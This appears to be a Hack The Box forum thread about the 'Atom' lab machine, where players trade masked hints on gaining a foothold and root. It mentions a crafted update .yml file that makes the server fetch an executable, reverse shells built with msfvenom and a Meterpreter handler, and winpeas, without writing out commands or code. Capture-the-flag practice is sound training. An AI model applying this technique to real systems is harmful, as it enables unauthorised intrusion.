Official Atom Discussion

What is foothold?
r****, s**, or anything else?

Hi guys, Im not sure If Iā€™m at right path to get normal user (is it based on the yā€¦ file ?). Pls PM me if you have time.

Type your comment> @dylvie said:

Sorry but iā€™m unable to catch the admin encrypted password with r***-cli. Any help please ?

Can someone please PM me with a nudge on the foothold for this machine? Thanks in advance.

Iā€™ve read a pdf, Iā€™ve read a web page, see the exploit but canā€™t put the pieces together to create the right .**l file. :frowning:

Shooted. :stuck_out_tongue: Dm for any help. :slight_smile:

I am completely stuck. I have created my l*****.y** file, uploaded it where it needs to go, I can see the server request my exe, and then nothing. Tried a million different shells and modification to my .y** file. Any nudges? Feel free to PM.

Type your comment> @s00ner said:

I am completely stuck. I have created my l*****.y** file, uploaded it where it needs to go, I can see the server request my exe, and then nothing. Tried a million different shells and modification to my .y** file. Any nudges? Feel free to PM.

try to use m********r payload created with msfvenom

try to use m********r payload created with msfvenom

Thatā€™s what Iā€™ve been trying (among other payloads) with no luck so far.

*edit: I figured it out. I was missing a flag in msfvenom the whole time.

Took me forever to get the initial foothold since I was trying to copy an article a bit too much. Getting to root was relatively smooth after I fixed how I was asking for information from the other service. Feel free to message me for a nudge!

So my listener is picking up the connection after pushing the .y*, but no response after that :confused: Anyone else run into this?

Growing increasingly frustrated with this box. I checked with several people who have gained a foothold on what to do, and the method Iā€™m employing seems to be correct (using the l*****.y***). Just like @3xxu5 i can see the requests coming into my server, but no response. Tried multiple payloads, multiple methods and even several computers - none work.

Any help with this box would be greatly appreciated. Perhaps Iā€™m missing somethingā€¦ DM-me if you think you can help?

Rooted!!.. That was the hardest medium box I have ever doneā€¦The user was quite obvious after the right google search tho but the root was a pain.

Initial-foothole/User

  • Portable Document Formats files can give you a lot of information
  • Sometimes following the exact same thing you see may not be usefulā€¦Play with it a bitā€¦See where the real vulnerability is

Root

  • Go back to your scansā€¦See what services may use passwords.
  • If you download a movie, where would it be saved?

Hope these hints would help you a bit. If you need help, DM me. I will try to get you on track.

Finally got user ā€¦ this took SO much fiddling for me. I knew exactly what the exploit was but all these different little details were killing me.

Rooted !

User : basic scanning and enumeration will tell you what to do and what to look for,
you will find something which will give some information to further go on.

Root : look for the installed applications/application files and the opened ports,
connect this two, you may find a way.

DM me for nudges

finally rooted! user was honestly a lot harder than root imo, since the steps to it are pretty vague.

User/foothold: Enumerate like how you usually would, at some point you should stumble across something that will vaguely point you in the write direction. Now do some google fu. If youā€™re like me, make sure not to be lazy at reading and researching, youā€™ll only waste your time if you copy something without understanding it.

root: Enumerate the target machine as usual. You might stumble across something that will give you deja vu. If not look at whats being used on the machine, and what ports are open. and google some stuff again. Once you connect the dots privsec is pretty straight forward and is the easier part of this box imo.

After a painfully long time I finally rooted it. A lot of it has to do with the fact that this is the first windows box Iā€™ve attempted in months, but itā€™s still fairly difficult if youā€™re unaware of what youā€™re supposed to be looking for.

Tips for user: This one came to me fairly quickly, not sure if it was blind luck or what but itā€™s fairly easy to come by during your usual enumeration checklist. It may seem like a far reach to begin with, but doing a bit of googling will show you exactly what you need. In my case it was the first search result.

Tips for root: Honestly, without a sanity check from a helpful user I probably wouldā€™ve ignored this or left it until last. As previous people have mentioned, this service is sending outbound connections, that information tied with a short winpeas search will hopefully give you all you need. It may take you a hot minute to figure out what to do with what you find from that service, but enumerating some common places in the user folder will lead you to your answer.

Hello everyone,

Iā€™m stuck on the foothold and would appreciate some helpā€¦ I have my .y** file and an .e**. I can see my file is getting downloaded on the server, but then nothing happens.
Iā€™m using mvm to generate the payload and use mi/h***r to catch the revsh. I tried so many different payloads (with/without encoding (2-3 encodings)) and different ports, I donā€™t know what to do anymore :neutral:
(Iā€™m using the flags -p, -f, -o (and -e when encoding)

Would any of you know what could be the cause?

Thank you and happy hacking!

Hi,

I just got user and I was having the same issues with you about the rev shell not happening. It ended to be something in the name of the file that needs to be included for the exploit to work. If you found the blog about this vulnerability, please check it again and you will find out what is that you are missing. Well, that was on my case the issue.

If still stuck let me know.

Pepe

Type your comment> @Netpal said:

Hello everyone,

Iā€™m stuck on the foothold and would appreciate some helpā€¦ I have my .y** file and an .e**. I can see my file is getting downloaded on the server, but then nothing happens.
Iā€™m using mvm to generate the payload and use mi/h***r to catch the revsh. I tried so many different payloads (with/without encoding (2-3 encodings)) and different ports, I donā€™t know what to do anymore :neutral:
(Iā€™m using the flags -p, -f, -o (and -e when encoding)

Would any of you know what could be the cause?

Thank you and happy hacking!

When getting the foothole, you may have to play with the .**l file a bit. Donā€™t just follow the POC. Understand what the real vulnerability is. Then make your own exploit. Remember what a ā€œnull byteā€ is and that you have to remove bytes like them.

If you get stuck DM me.